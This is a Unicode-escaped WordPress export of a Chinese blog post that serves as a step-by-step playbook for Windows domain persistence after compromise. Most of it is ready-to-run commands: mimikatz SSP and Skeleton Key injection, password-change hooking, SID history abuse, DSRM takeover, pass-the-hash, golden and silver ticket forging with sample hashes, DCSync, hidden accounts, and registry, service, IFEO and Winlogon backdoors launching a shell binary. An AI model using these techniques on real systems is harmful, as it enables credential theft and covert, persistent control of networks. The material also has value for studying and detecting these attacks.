\u603b\u7ed3:<\/p>\n\n\n\n
\u57df\u5185<\/p>\n\n\n\n
SSP=>\u5b9e\u73b0\u8eab\u4efd\u8ba4\u8bc1=>mimikatz\/\u4fee\u6539\u6ce8\u518c\u8868 =>\u8bb0\u5f55\u767b\u5f55\u5bc6\u7801<\/p>\n\n\n\n
\u4fee\u6539\u5bc6\u7801\u52ab\u6301=>hookpasswordchange =>\u8bb0\u5f55\u767b\u5f55\u5bc6\u7801<\/p>\n\n\n\n
Skeleton Key(\u4e07\u80fd\u94a5\u5319)\u767b\u5f55\u8fdb\u7a0b\u52ab\u6301 <\/p>\n\n\n\n
SID history-\u7528\u6237\u5c5e\u6027\u4fee\u6539<\/p>\n\n\n\n
DSRM-\u57fa\u4e8e\u673a\u5236\u8d26\u53f7\u542f\u7528<\/p>\n\n\n\n
\u57fa\u4e8e\u8f6f\u4ef6\u4e0a\u7ebf=>(GotoHTTP\/rustdesk)<\/p>\n\n\n\n
\u9ec4\u91d1\u7968\u636eTGT=>krbtgt=>krbtgt ntlm hash & \u767d\u94f6\u7968\u636eST=>\u5355\u4e00\u7528\u6237\u5355\u4e00\u670d\u52a1 \u7528\u6237\u7684ntlm hash<\/p>\n\n\n\n
\u57df\u5916<\/p>\n\n\n\n
\u9690\u85cf\u7528\u6237=>\u8f6f\u4ef6CreateHiddenAccount<\/p>\n\n\n\n
\u81ea\u542f\u52a8=>\u8def\u5f84\u52a0\u8f7d\/\u670d\u52a1\u52a0\u8f7d\/\u6ce8\u518c\u8868\u52a0\u8f7d\/\u8ba1\u5212\u4efb\u52a1<\/p>\n\n\n\n
\u5370\u8c61\u52ab\u6301=> \u4fee\u6539\u6ce8\u518c\u8868\tGlobalFlag\u9690\u85cf<\/p>\n\n\n\n
\u529f\u80fd\u52ab\u6301=>wingon(\u767b\u5f55\u65f6\u8fd0\u884c)|\u914d\u5408powershell\t\t\u5c4f\u5e55\u4fdd\u62a4<\/p>\n\n\n\n
\u62ff\u4e0b\u57df\u63a7-><\/p>\n\n\n\n
SSP---Security Support Provider,\u76f4\u8bd1\u4e3a\u5b89\u5168\u652f\u6301\u63d0\u4f9b\u8005\uff0c\u53c8\u540dSecurity Package\u3002\u7b80\u5355\u7684\u7406\u89e3\u4e3aSSP\u5c31\u662f\u4e00\u4e2aDLL,\u7528\u6765\u5b9e\u73b0\u8eab\u4efd\u8ba4\u8bc1\uff0c\u5e76\u4e14\u7ef4\u7279\u7cfb\u7edf\u6743\u9650\n\n\u5982\u679c\u83b7\u5f97\u76ee\u6807\u7cfb\u7edfsystem\u6743\u9650\uff0c\u53ef\u4ee5\u4f7f\u7528\u8be5\u65b9\u6cd5\u8fdb\u884c\u6301\u4e45\u5316\u64cd\u4f5c\n\n\u5176\u4e3b\u8981\u539f\u7406\u662f\uff1aLSA(Loca1 Security Authority)\u7528\u4e8e\u8eab\u4efd\u9a8c\u8bc1\uff1blsass.exe\u4f5c\u4e3awindows\u7684\u7cfb\u7edf\u8fdb\u7a0b\uff0c\u7528\u4e8e\u672c\u5730\u5b89\u5168\u548c\u767b\u5f55\u7b56\u7565\uff1b\u5728\u7cfb\u7edf\u542f\u52a8\u65f6\uff0cSSP\u5c06\u88ab\u52a0\u8f7d\u5230lsass.exe\u8fdb\u7a0b\u4e2d\u3002\u4f46\u662f\uff0c\u5047\u5982\u653b\u51fb\u8005\u5bf9LsA\u8fdb\u884c\u4e86\u6269\u5c55\uff0c\u81ea\u5b9a\u4e49\u4e86\u6076\u610f\u7684DLL\u6587\u4ef6\uff0c\u5728\u7cfb\u7edf\u542f\u52a8\u65f6\u5c06\u5176\u52a0\u8f7d\u5230lsass.exe\u8fdb\u7a0b\u4e2d\uff0c\u5c31\u80fd\u591f\u83b7Lsass.exe\u8fdb\u7a0b\u4e2d\u7684\u660e\u6587\u5bc6\u7801\u3002\u8fd9\u6837\u5373\u4f7f\u7528\u6237\u66f4\u6539\u5bc6\u7801\u5e76\u91cd\u65b0\u767b\u5f55\uff0c\u653b\u51fb\u8005\u4f9d\u7136\u53ef\u4ee5\u83b7\u5f97\u8be5\u8d26\u53f7\u7684\u65b0\u5bc6\u7801<\/code><\/pre>\n\n\n\n\u4e0b\u5217\u4e24\u4e2a\u4e92\u8865\t=>\u76d7\u53d6\u5bc6\u7801<\/p>\n\n\n\n
mimikatz<\/h5>\n\n\n\n\u57df\u673a\u5668mimikatz\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\nprivilege::debug\n#\u63d0\u5347\u6743\u9650\nmisc::memssp\n#\u8bb0\u5f55\u7ef4\u6743\u5de5\u4f5c\n\u6ce8\u9500\/\u5207\u6362\u7528\u6237\nC:\\Windows\\System32\\mimilsa.log \u8bb0\u5f55\u767b\u5f55\u7684\u8d26\u53f7\u5bc6\u7801\n\u7f3a\u70b9\uff1a\u91cd\u542f\u540e\u4f1a\u5931\u6548\uff0c\u88ab\u6ce8\u5165\u5185\u5b58\u7684\u4f2a\u9020\u7684SSP\u5c06\u4f1a\u4e22\u5931\u3002<\/code><\/pre>\n\n\n\n\u4fee\u6539\u6ce8\u518c\u8868<\/h5>\n\n\n\n\u4f7f\u7528\u6b64\u65b9\u6cd5\u5373\u4f7f\u7cfb\u7edf\u91cd\u542f\uff0c\u4e5f\u4e0d\u4f1a\u5f71\u54cd\u5230\u6301\u4e45\u5316\u7684\u6548\u679c\u3002\n1\u3001mimilib.dll\u4f20\u5230\u76ee\u6807\u57df\u63a7\u7684c:windows\\system32\\(\nmimilib.dll\u6587\u4ef6\u4e3a\u7315\u7334\u6843\u81ea\u5e26\n2\u3001\u4fee\u6539\u6ce8\u518c\u8868\uff0c\u91cd\u542f\u751f\u6548(regedit)\nreg query hklm\\system\\currentcontrolset\\control\\lsa\\ \/v \"Security Packages\"\t#\u67e5\u770b\u503c\n\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\Lsa\" \/v \"Security Packages\" \/d \"kerberos\\0msv1_0\\0schannel\\0wdigest\\0tspkg\\0pku2u\\0mimilib\" \/t REG_MULTI_SZ\t #\u4fee\u6539\u503c\n\u91cd\u542f\u8ba1\u7b97\u673a\nc:\\windows\\system32\\kiwissp.log\u8bb0\u5f55\u8d26\u53f7\u5bc6\u7801\u6587\u4ef6\n\u7f3a\u70b9\uff1a\u91cd\u542f\u540e\u4e0d\u4f1a\u5931\u6548\u3002\u4f46\u751f\u6548\u524d\u63d0\u9700\u8981\u91cd\u542f\u624d\u80fd\u751f\u6548<\/code><\/pre>\n\n\n\n\u5c06log\u6587\u4ef6\u5b58\u653e\u5728web\u7aef=>\u8bbf\u95ee\u53ef\u5f97\/\t<\/p>\n\n\n\n
DLL\u52a0\u8f7d-\u4fee\u6539\u5bc6\u7801\u52ab\u6301<\/h4>\n\n\n\n
\u62e6\u622a\u5bc6\u7801\u4fee\u6539\u529f\u80fd=>\u4fdd\u5b58\u4fee\u6539\u5bc6\u7801=>\u518d\u8fdb\u884c\u4fee\u6539<\/p>\n\n\n\n
https:\/\/github.com\/wh0Nsq\/HookPasswordChange\nhttps:\/\/github.com\/clymb3r\/Misc-Windows-Hacking<\/code><\/pre>\n\n\n\nHookPasswordChange<\/p>\n\n\n\n
\u7ba1\u7406\u5458\u8eab\u4efd\u8fd0\u884c\n.\/HookPasswordChangeNotify.ps1\n\u4fee\u6539\u7684\u5bc6\u7801\u4f1a\u4fdd\u5b58\u5728C:\\Windows\\Temp<\/code><\/pre>\n\n\n\nSkeleton Key-\u767b\u5f55\u8fdb\u7a0b\u52ab\u6301<\/h4>\n\n\n\nSkeleton Key\u4e07\u80fd\u94a5\u5319\n\u5373\u7ed9\u6240\u6709\u57df\u5185\u7528\u6237\u6dfb\u52a0\u4e00\u4e2a\u76f8\u540c\u7684\u5bc6\u7801\uff0c\u57df\u5185\u6240\u6709\u7684\u7528\u6237\u90fd\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u5bc6\u7801\u8fdb\u884c\u8ba4\u8bc1\uff0c\u540c\u65f6\u539f\u59cb\uff1a\u5bc6\u7801\u4e5f\u53ef\u4ee5\u4f7f\u7528\uff0c\u5176\u539f\u7406\u5c31\u662f\u5bf9lsass.exe(\u7528\u4e8e\u672c\u5730\u5b89\u5168\u8ba4\u8bc1\u670d\u52a1\u5668)\u8fdb\u884c\u6ce8\u5165\uff0c\u6240\u4ee5\u91cd\u542f\u540e\u4f1a\u6548\uff0c\u4e0d\u9700\u8981\u91cd\u542f\n\u5c06skeleton Key\u5b89\u88c5\u5728\u57df\u63a7\u524a\u5668\u4e0a\uff0c\u4fbf\u80fd\u591f\u80fd\u591f\u8ba9\u6240\u6709\u57df\u7528\u6237\u4f7f\u7528\u540c\u4e2a\u4e07\u80fd\u5bc6\u7801\u5bf9\u57df\u63a7\u8fdb\u884c\u767b\u5f55\uff0c\u73b0\u6709\u7684\u6240\u6709\u57df\u7528\u6237\u4f7f\u7528\u539f\u5bc6\u7801\u4ecd\u80fd\u7ee7\u7eed\u767b\u5f55\uff0c\u6ce8\u610f\u4e07\u80fd\u5bc6\u7801\u5e76\u4e0d\u80fd\u66f4\u6539\u7528\u6237\u6743\u9650\uff0c\n\n\u91cd\u542f\u5c06\u5931\u6548.\n\n\u9002\u7528\u6761\u4ef6\t(\u62ff\u4e0b\u57df\u63a7\t\u67d0\u4e2a\u7528\u6237\u4e0e\u57df\u63a7\u901a\u8bafdir \\\\owa2010cn-god\\c$-\u62d2\u7edd\u8bbf\u95ee)\n\u57df\u63a7(mimikatz\u64cd\u4f5c):\nprivilege::debug\nmisc::skeleton\n\n\u5176\u4f59\u7528\u6237\u4f7f\u7528\u4e07\u80fd\u5bc6\u7801\u767b\u5f55\nnet use \\\\owa2010cn-god\\ipc$ \"mimikatz\" \/user:god\\administrator\ndir \\\\owa2010cn-god\\c$<\/code><\/pre>\n\n\n\nSID history-\u7528\u6237\u5c5e\u6027\u4fee\u6539<\/h4>\n\n\n\nwmic useraccount get\t\u67e5\u770b\u57df\u7528\u6237sid\u60c5\u51b5\n\npowershell\u4e0b\u8fd0\u884c\nImport-Module ActiveDirectory\n\nGet-ADUser \u57df\u7528\u6237\u7528\u6237\u540d -Properties sidhistory\n\u5982:Get-ADUser webadmin -Properties sidhistory\n\nprivilege::debug\nsid::patch\nsid::add \/sam:\u57df\u7528\u6237\u7528\u6237\u540d \/new:administrator\n\u5982: sid::add \/sam:webadmin \/new:administrator<\/code><\/pre>\n\n\n\nDSRM-\u57fa\u4e8e\u673a\u5236\u8d26\u53f7\u542f\u7528<\/h4>\n\n\n\nDSRM(Diretcory Service Restore Mode,\u76ee\u5f55\u670d\u52a1\u6062\u590d\u6a21\u5f0f)\n\u662fwindows\u57df\u73af\u5883\u4e2d\u57df\u63a7\u5236\u5668\u7684\u5b89\u5168\u6a21\u5f0f\u542f\u52a8\u9009\u9879\u3002\n\u57df\u63a7\u5236\u5668\u7684\u672c\u5730\u7ba1\u7406\u5458\u8d26\u6237\u4e5f\u5c31\u662fDSRM\u8d26\u6237\uff0cDSRM\u5bc6\u7801\u662f\u5728DC\u521b\u5efa\u65f6\u8bbe\u7f6e\u7684\uff0c\u4e00\u822c\u5f88\u5c11\u66f4\u6539\u3002\nDSRM\u7684\u7528\u9014\u662f\uff1a\u5141\u8bb8\u7ba1\u7406\u5458\u5728\u57df\u73af\u5883\u51fa\u73b0\u6545\u969c\u65f6\u8fd8\u539f\u3001\u4fee\u590d\u91cd\u5efa\u6d3b\u52a8\u76ee\u5f55\u6570\u636e\u5e93\u3002\u901a\u8fc7\u5728Dc\u4e0a\u8fd0\u884cntdsutl\u5de5\u5177\u53ef\u4ee5\u4fee\u6539DSRM\u5bc6\u7801\u3002\n\u5728\u57df\u63a7\u4e2d\uff0cDSRM\u8d26\u53f7\u53ef\u89c6\u4e3a\u57df\u63a7\u7684\u672c\u5730\u7ba1\u7406\u5458\u8d26\u53f7\n\u5728DSRM\u8d26\u53f7\u53ef\u4ee5\u767b\u5f55\u57df\u63a7\u7684\u524d\u63d0\u4e0b\uff0c\u5982\u679c\u6211\u4eec\u83b7\u5f97\u4e86\u57df\u63a7\u7684\u6743\u9650\uff0c\u5728\u57df\u63a7\u4e0acmd\u8fdb\u5165ntdsutil,\u5c06DSRM\u8d26\u53f7\u7684\u5bc6\u7801\u8fdb\u884c\u4fee\u6539\uff08\u5e38\u540c\u6b65\u4e3akrbtgt\u7684NTLM hash),\u4e4b\u540e\u5728\u57df\u5185\u4efb\u4f55\u4e00\u53f0\u4e3b\u673a\uff08\u5305\u62ec\u57df\u63a7\u672c\u8eab\uff09\u4e0a\u901a\u8fc7\u4fee\u6539\u540e\u7684hash,\u8fdb\u884cPTT\u5b9e\u73b0\u8fdc\u7a0b\u8bbf\u95ee\u63a7\u5236\nkrbtgt\u7ba1\u7406\u7528\u6237\u767b\u5f55=>\u76f8\u5f53\u4e8e\u68c0\u7968\u5458<\/code><\/pre>\n\n\n\n\u57df\u63a7\u64cd\u4f5c:\nmimikatz\u8fd0\u884c:\n\u83b7\u53d6dsrm\u53cakrbtgt\u7684NTLM hash\nprivilege::debug\nlsadump::lsa \/patch \/name:krbtgt =>\u83b7\u53d6hash(ntlm):b097d7ed97495408e1537f706c357fc5\ntoken::elevate\nlsadump::sam\n\ncmd:\nNTDSUTIL \t\t\t\t#\u6253\u5f00ntdsutil\nset DSRM password \t\t#\u4fee\u6539DSRM\u7684\u5bc6\u7801\nsync from domain account (krbtgt)\t#\u57df\u7528\u6237\u540d\u5b57\uff1a\u4f7fDSRM\u7684\u5bc6\u7801\u548c\u6307\u5b9a\u57df\u7528\u6237\u7684\u5bc6\u7801\u540c\u6b65\nq(\u7b2c1\u6b21)\t\t\t\t\t\t#\u9000\u51faDSRM\u5bc6\u7801\u8bbe\u7f6e\u6a21\u5f0f\nq(\u7b2c2\u6b21)\t\t\t\t\t\t#\u9000\u51fantdsutil\n\n\u4fee\u6539dsrm\u767b\u5f55\u65b9\u5f0f\npowershell:\nNew-ItemProperty \"hklm:\\system\\currentcontrolset\\control\\lsa\\\" -name \"dsrmadminlogonbehavior\" -value 2 -propertyType DWORD\n\n\u5176\u4ed6\u57df\u5185\u4e3b\u673a\n\u5229\u7528PTH\u4f20\u9012\u653b\u51fb\nmimikatz\u8fd0\u884c:\nprivilege::debug\nsekurlsa::pth \/domain:owa2010cn-god \/user:administrator \/ntlm:b097d7ed97495408e1537f706c357fc5<\/code><\/pre>\n\n\n\n\u57fa\u4e8e\u8f6f\u4ef6\u4e0a\u7ebf<\/h4>\n\n\n\nGotoHTTP\nrustdesk\nC:\\Users\\\u7528\u6237\u540d\\AppData Roaming\\RustDesk\\config<\/code><\/pre>\n\n\n\n\u9ec4\u91d1&\u767d\u94f6\u7968\u636e<\/h4>\n\n\n\n
dir \\\\owa2010cn-god\\c$<\/p>\n\n\n\n
krbtgt \u5bc6\u94a5\u53d1\u884c\u4e2d\u5fc3\u670d\u52a1\u8d26\u6237\n\u9ec4\u91d1\u7968\u636e\u751f\u6210\u653b\u51fb\uff0c\u662f\u751f\u6210\u6709\u6548\u7684TGT Kerberos\u7968\u636e\n\u5e76\u4e14\u4e0d\u53d7TGT\u751f\u547d\u5468\u671f\u7684\u5f71\u54cd(TGT\u9ed8\u8ba410\u5c0f\u65f6\uff0c\u6700\u591a\u7eed\u8ba27\u5929)\n\u8fd9\u91cc\u53ef\u4ee5\u4e3a\u4efb\u610f\u7528\u6237\u751f\u6210\u9ec4\u91d1\u7968\u636e\n\u7136\u540e\u4e3a\u57df\u7ba1\u7406\u5458\u751f\u6210TGT,\u8fd9\u6837\u666e\u901a\u7528\u6237\u5c31\u53ef\u4ee5\u53d8\u6210\u57df\u7ba1\u7406\u5458\u3002\nkrbtgt(\u7968\u636e)==>\u9ec4\u91d1\u7968\u636e \u65f6\u95f4\u4e0d\u9650,\u6743\u9650\u9ad8\n\n\u767d\u94f6\u7968\u636e(SILVER TICKET)\n\u662f\u5229\u7528\u57df\u7684\u670d\u52a1\u8d26\u6237\u8fdb\u884c\u4f2a\u9020\u7684ST,\n\u5728Kerberos\u8ba4\u8bc1\u7684\u7b2c\u4e09\u6b65\uff0c\nClient\u5e26\u7740ST\u548cAuthenticator3\u5411Server\u4e0a\u7684\u67d0\u4e2a\u670d\u52a1\u8fdb\u884c\u8bf7\u6c42\uff0c\nServer\u63a5\u6536\u5230Client\u7684\u8bf7\u6c42\u4e4b\u540e\uff0c\u901a\u8fc7\u81ea\u5df1\u7684Master Key\u89e3\u5bc6ST,\n\u4ece\u800c\u83b7\u5f97Session Key\u3002\u6240\u4ee5\u53ea\u9700\u8981\u77e5\u9053Server\u7528\u6237\u7684Hash\u5c31\u53ef\u4ee5\u4f2a\u9020\u51fa\u4e00\u4e2asT,\n\u4e14\u4e0d\u4f1a\u7ecf\u8fc7KDC,\u4f46\u662f\u4f2a\u9020\u7684\u95e8\u7968\u53ea\u5bf9\u90e8\u5206\u670d\u52a1\u8d77\u4f5c\u7528\uff08\u4e0d\u9700\u8981\u4ea4\u4e92KDC,\u9700\u8981\u77e5\u9053Server\u7684NTLM Hash)\u3002\n\n\n\n\u91d1\u7968\u548c\u94f6\u7968\u7684\u533a\u522b#\n\u83b7\u53d6\u7684\u6743\u9650\u4e0d\u540c#\n\u91d1\u7968\uff1a\u4f2a\u9020\u7684TGT\uff0c\u53ef\u4ee5\u83b7\u53d6\u4efb\u610fKerberos\u7684\u8bbf\u95ee\u6743\u9650\n\u94f6\u7968\uff1a\u4f2a\u9020\u7684ST\uff0c\u53ea\u80fd\u8bbf\u95ee\u6307\u5b9a\u7684\u670d\u52a1\uff0c\u5982CIFS\n\u8ba4\u8bc1\u6d41\u7a0b\u4e0d\u540c#\n\u91d1\u7968\uff1a\u540cKDC\u4ea4\u4e92\uff0c\u4f46\u4e0d\u540cAS\u4ea4\u4e92\n\u94f6\u7968\uff1a\u4e0d\u540cKDC\u4ea4\u4e92\uff0c\u76f4\u63a5\u8bbf\u95eeServer\n\u52a0\u5bc6\u65b9\u5f0f\u4e0d\u540c#\n\u91d1\u7968\uff1a\u7531krbtgt NTLM Hash \u52a0\u5bc6\n\u94f6\u7968\uff1a\u7531\u670d\u52a1\u8d26\u53f7 NTLM Hash \u52a0\u5bc6<\/code><\/pre>\n\n\n\n\u9ec4\u91d1\u7968\u636e<\/p>\n\n\n\n
\u524d\u63d0:\n\u5df2\u7ecf\u62ff\u4e0b\u57df\u7ba1\u7406\u5458,\u83b7\u53d6\u5230krbtgt\thash;\n\u5229\u7528krbtgt\u7684hash\u5236\u4f5c\u9ec4\u91d1\u7968\u636e,\u8fdb\u884c\u653b\u51fb\n\n\u6d41\u7a0b:\n\u83b7\u53d6\u57df\u540d:\n\u83b7\u53d6\u57df\u7684sid:\t\tS-1-5-21-1218902331-2157346161-1782232778\t\twhoami \/user\nwhoami \/all\nwmic useraccount get name,sid\n\n\u83b7\u53d6\u57df\u7684krbtgt\u8d26\u6237\u7684NTLM-HASH:\tb097d7ed97495408e1537f706c357fc5\n=>\u5229\u7528mimikatz:\nprivilege::debug\nlsadump::lsa \/patch\n\n\u4f2a\u9020\u7528\u6237\u540d:\u4efb\u610f\u57df\u5185\u5df2\u77e5\u7528\u6237\u540d \t!!\u4e0d\u9700\u8981\u63d0\u6743\u76f4\u63a5\u8fd0\u884c\nkerberos::golden \/user:<\u7528\u6237\u540d> \/domain:<\u57df> \/sid:<\u57df\u7684SID\u503c> \/krbtgt:<KRBTGT\u8d26\u6237HASH> \/ticket:<\u7968\u636e\u540d\u79f0(\u53ef\u968f\u610f)>\nkerberos::golden \/user:dbadmin \/domain:god.org \/sid:S-1-5-21-1218902331-2157346161-1782232778 \/krbtgt:b097d7ed97495408e1537f706c357fc5 \/ticket:haha\n\n\u5bfc\u5165\u7968\u636e\nmimikatz kerberos::ptt haha<\/code><\/pre>\n\n\n\n\u767d\u94f6\u7968\u636e<\/p>\n\n\n\n
\u8bbf\u95ee\u6307\u5b9a\u8ba1\u7b97\u673a\u7684\u6307\u5b9a\u670d\u52a1\t\t<\/p>\n\n\n\n
\u6587\u4ef6\u5206\u4eabcifs\t\t<\/p>\n\n\n\n
\u524d\u63d0:\n\u5df2\u7ecf\u62ff\u4e0b\u57df\u7ba1\u7406\u5458\uff0c\u83b7\u53d6\u5230DC hash\uff08owa2010cn-god \uff09\uff1b\n\u5229\u7528DC\u7684hash\u5236\u4f5c\u767d\u94f6\u7968\u636e\u5de5\u5177\uff0c\u8fdb\u884c\u653b\u51fb\u3002\n\n\u6d41\u7a0b:\n\u83b7\u53d6\u57df\u540d:\t\tgod.org\n\u83b7\u53d6\u57df\u7684sid:\t\tS-1-5-21-1218902331-2157346161-1782232778\t\twhoami \/user\nwhoami \/all\nwmic useraccount get name,sid\n\n\u83b7\u53d6\u57dfDC\u8d26\u6237NTLM-HASH\t:51e952b4dcdaaac8abba9b79ad9e69e0\n=>\u5229\u7528mimikatz:\t\nprivilege::debug\nsekurlsa::logonpasswords\n\n\u4f2a\u9020\u7528\u6237\u540d:\u4efb\u610f\u57df\u5185\u5df2\u77e5\u7528\u6237\u540d (\u4e0d\u8981\u63d0\u6743)\nmimikatz kerberos::golden \/user:<\u4efb\u610f\u7528\u6237\u540d> \/domain:<\u57df\u540d> \/sid:<\u57df\u7684SID> \/target:<\u76ee\u6807\u8ba1\u7b97\u673a\u540d\u5168\u79f0> \/service:cifs \/rc4:<DC\u8d26\u6237NTLM-HASH> \/ptt\t\t\tST=>\u9488\u5bf9\u67d0\u4e2a\u7528\u6237\u67d0\u4e2a\u670d\u52a1\n\nkerberos::golden \/user:webadmin \/domain:god.org \/sid:S-1-5-21-1218902331-2157346161-1782232778 \/target:owa2010cn-god.god.org \/service:cifs \/rc4:51e952b4dcdaaac8abba9b79ad9e69e0 \/ptt\n\u6587\u4ef6\u5206\u4eabcifs\n\n\n\n\ndir \\\\owa2010cn-god\\c$\n\n\u767d\u94f6\u5230\u9ec4\u91d1\u7968\u636e\u5347\u7ea7(ldap\u670d\u52a1\u5f00\u542f)\n\nkerberos::golden \/user:webadmin \/domain:god.org \/sid:S-1-5-21-1218902331-2157346161-1782232778 \/target:owa2010cn-god.god.org \/service:ldap \/rc4:51e952b4dcdaaac8abba9b79ad9e69e0 \/ptt\n\n(\u9700\u8981ldap\u670d\u52a1\u624d\u80fd\u6293\u53d6\u57df\u63a7\u7684krbtgt)\nmimikatz lsadump::dcsync \/dc:owa2010cn-god.god.org \/domain:god.org \/user:krbtgt\t\t\n\u83b7\u53d6krbtgt\u7684\u54c8\u5e0c\u503c\t\n\nkerberos::golden \/user:dbadmin \/domain:god.org \/sid:S-1-5-21-1218902331-2157346161-1782232778 \/krbtgt:b097d7ed97495408e1537f706c357fc5 \/ticket:yiy\n\u83b7\u53d6krbtgt\u7968\u636e\t\n\u5bfc\u5165mimikatz kerberos::ptt yiy\n\u6210\u529f\u5f97\u5230\u9ec4\u91d1\u7968\u636e<\/code><\/pre>\n\n\n\n\u57df\u5916<\/h3>\n\n\n\n\u9690\u85cf\u7528\u6237<\/h4>\n\n\n\n\u547d\u4ee4\u6dfb\u52a0\nnet user user passwd \/add\t\u6dfb\u52a0user\u7528\u6237\nnet user user$ \/add\t\u6dfb\u52a0\u9690\u85cf\u7528\u6237\nnet user user \/del\t\u5220\u9664\u7528\u6237\n\nCreateHiddenAccount\u8f6f\u4ef6\u6dfb\u52a0=>\u5355\u673a\u7248\u65e0\u6cd5\u5220\u9664,\u57df\u73af\u5883\u53ef\u4ee5\u5220\u9664\nhttps:\/\/github.com\/wgpsec\/CreateHiddenAccount\nCreateHiddenAccount_upx_v0.2.exe -u \u7528\u6237\u540d -p \u5bc6\u7801 \u521b\u5efa\u9690\u85cf\u7528\u6237\nCreateHiddenAccount_upx_v0.2.exe -c \u67e5\u770b\u9690\u85cf\u7528\u6237\nCreateHiddenAccount_upx_v0.2.exe -d \u5220\u9664\u9690\u85cf\u7528\u6237<\/code><\/pre>\n\n\n\n\u81ea\u542f\u52a8<\/h4>\n\n\n\n\u81ea\u542f\u52a8\u8def\u5f84\u52a0\u8f7d<\/h5>\n\n\n\nC:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\n\u5982\u679c\u5b58\u5728\u81ea\u542f\u52a8\u5e94\u7528 =>\u6253\u5f00\u6587\u4ef6\u4f4d\u7f6e =>\u5229\u7528dll\u52ab\u6301<\/code><\/pre>\n\n\n\n\u81ea\u542f\u52a8\u670d\u52a1\u52a0\u8f7d<\/h5>\n\n\n\n\u521b\u5efa\u670d\u52a1\nsc create \u670d\u52a1\u540d binPath= \u6728\u9a6c\u7edd\u5bf9\u8def\u5f84 start= auto\nsc create ServiceTest binPath= C:\\shell.exe start= auto\n\u542f\u52a8\u670d\u52a1\nsc start ServiceTest\n\u5220\u9664\u670d\u52a1\nsc delete \u670d\u52a1\u540d\n\u53ef\u4e0e\u4e0d\u5e26\u5f15\u53f7\u4e0d\u5b89\u5168\u670d\u52a1\u8054\u7528\n<\/code><\/pre>\n\n\n\n\u81ea\u542f\u52a8\u6ce8\u518c\u8868\u52a0\u8f7d<\/h5>\n\n\n\nREG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" \/V \"\u670d\u52a1\u540d\" \/t REG_SZ \/F \/D \"\u7edd\u5bf9\u8def\u5f84\"\nREG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" \/V \"backdoor\" \/t REG_SZ \/F \/D \"C:\\shell.exe\"<\/code><\/pre>\n\n\n\n\u8ba1\u5212\u8ba1\u65f6\u4efb\u52a1<\/h5>\n\n\n\nAT\u547d\u4ee4\u7b49<\/code><\/pre>\n\n\n\n\u5370\u8c61\u52ab\u6301<\/h4>\n\n\n\n\u5f3a\u5236\u66ff\u6362\u6267\u884c<\/h5>\n\n\n\n
\u6253\u5f00\u8bb0\u4e8b\u672c\u4f1a\u66ff\u6362\u4e3a\u6253\u5f00\u8ba1\u7b97\u5668<\/p>\n\n\n\n
REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" \/v debugger \/t REG_SZ \/d \"C:\\Windows\\System32\\cmd.exe \/c calc\"\n\u5c06\u672c\u662ftxt\u6587\u4ef6\u8f6c\u6362\u4e3a\u8ba1\u7b97\u673a\/\u6728\u9a6c\n\u7f3a\u70b9:\u5bb9\u6613\u88ab\u53d1\u73b0<\/code><\/pre>\n\n\n\n\u914d\u5408GlobalFlag\u9690\u85cf<\/h5>\n\n\n\n
\u9000\u51fatxt\u6587\u4ef6\u65f6\u4f1a\u6253\u5f00shell.exe<\/p>\n\n\n\n
reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" \/v GlobalFlag \/t REG_DWORD \/d 512\n\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" \/v ReportingMode \/t REG_DWORD \/d 1\n\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" \/v MonitorProcess \/d \"C:\\shell.exe\"<\/code><\/pre>\n\n\n\n\u529f\u80fd\u52ab\u6301<\/h4>\n\n\n\nWinlogon<\/h5>\n\n\n\n
\u767b\u5f55\u65f6\u8fd0\u884c userinit.exe <\/p>\n\n\n\n
\u672c\u5730\u6587\u4ef6\u6267\u884c\t\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" \/V \"Userinit\" \/t REG_SZ \/F \/D \"C:\\Windows\\System32\\userinit.exe,C:\\shell.exe\"\n\n\u65e0\u6587\u4ef6\u843d\u5730\u4e0a\u7ebf\t\ncs\u751f\u6210\u6728\u9a6c=>payload\u751f\u6210\u5668(P)=>Powershell command\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" \/V \"Userinit\" \/t REG_SZ \/F \/D \"C:\\Windows\\System32\\userinit.exe,<powershell>\"<\/code><\/pre>\n\n\n\n\u5c4f\u5e55\u4fdd\u62a4\u4e0a\u7ebf<\/h5>\n\n\n\n
\u542f\u52a8\u5c4f\u5e55\u4fdd\u62a4\u65f6\u4e0a\u8fd0\u884c<\/p>\n\n\n\n
reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" \/v SCRNSAVE.EXE \/t REG_SZ \/d \"C:\\shell.exe\" \/f<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"\u603b\u7ed3: \u57df\u5185 SSP=>\u5b9e\u73b0\u8eab\u4efd\u8ba4\u8bc1=>mimikatz\/\u4fee\u6539\u6ce8\u518c\u8868 =>\u8bb0\u5f55\u767b\u5f55\u5bc6\u7801 \u4fee\u6539\u5bc6\u7801\u52ab\u6301=>hoo … <\/p>\n","protected":false},"author":3,"featured_media":85,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-84","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-neiwang"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/84","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/w